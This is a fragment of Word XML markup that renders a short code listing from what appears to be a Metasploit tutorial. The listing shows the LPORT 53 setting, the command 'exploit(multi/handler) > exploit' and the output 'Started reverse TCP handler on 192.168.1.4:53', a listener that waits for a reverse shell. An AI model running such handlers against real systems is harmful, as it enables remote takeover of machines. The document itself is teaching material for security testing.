        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="156" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="6261" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>LPORT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>53</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>yes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="19"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>listen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>port</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="25" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>17</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="114" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="346" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="7942" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>target:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="13" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="13"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Name</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="129" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="13"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐‐</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐‐‐‐</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="114" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="346" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="7582" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="16"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Wildcard</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>23</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>24</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="124" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="5301" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>25</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>emsf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>multi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>handler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>26</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="43" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>27</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Started</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>reverse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>handler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>192.168</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>53</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11920" w:h="16840"/>
          <w:pgMar w:header="0" w:footer="0" w:top="0" w:bottom="0" w:left="0" w:right="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:91.500pt;width:449.500pt;height:20.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1830" coordsize="8990,410">
        <v:shape style="position:absolute;left:1490;top:1830;width:8990;height:410" coordorigin="1490,1830" coordsize="8990,410" path="m1510,1840l1510,1840,1510,1840,1510,1840,1510,1840,1510,1840,1510,1840,1511,1840,1512,1840,1512,1840,1514,1840,1515,1840,1517,1840,1519,1840,1521,1840,1524,1840,1528,1840,1532,1840,1536,1840,1541,1840,1546,1840,1552,1840,1559,1840,1566,1840,1575,1840,1583,1840,1593,1840,1603,1840,1615,1840,1627,1840,1640,1840,1654,1840,1668,1840,1684,1840,1701,1840,1719,1840,1738,1840,1758,1840,1780,1840,1802,1840,1826,1840,1851,1840,1877,1840,1904,1840,1933,1840,1963,1840,1995,1840,2028,1840,2063,1840,2099,1840,2136,1840,2175,1840,2216,1840,2259,1840,2303,1840,2348,1840,2396,1840,2445,1840,2496,1840,2549,1840,2604,1840,2660,1840,2719,1840,2779,1840,2841,1840,2906,1840,2972,1840,3041,1840,3112,1840,3184,1840,3259,1840,3336,1840,3416,1840,3498,1840,3582,1840,3668,1840,3757,1840,3848,1840,3941,1840,4037,1840,4136,1840,4236,1840,4340,1840,4446,1840,4555,1840,4666,1840,4780,1840,4897,1840,5017,1840,5139,1840,5264,1840,5392,1840,5523,1840,5657,1840,5793,1840,5933,1840,6076,1840,6222,1840,6370,1840,6522,1840,6677,1840,6835,1840,6997,1840,7161,1840,7329,1840,7500,1840,7675,1840,7853,1840,8034,1840,8219,1840,8407,1840,8598,1840,8793,1840,8992,1840,9194,1840,9400,1840,9609,1840,9823,1840,10039,1840,10260,1840,10484,1840,10484,1840,10484,1840,10484,1840,10484,1840,10484,1840,10484,1840,10484,1840,10484,1840,1048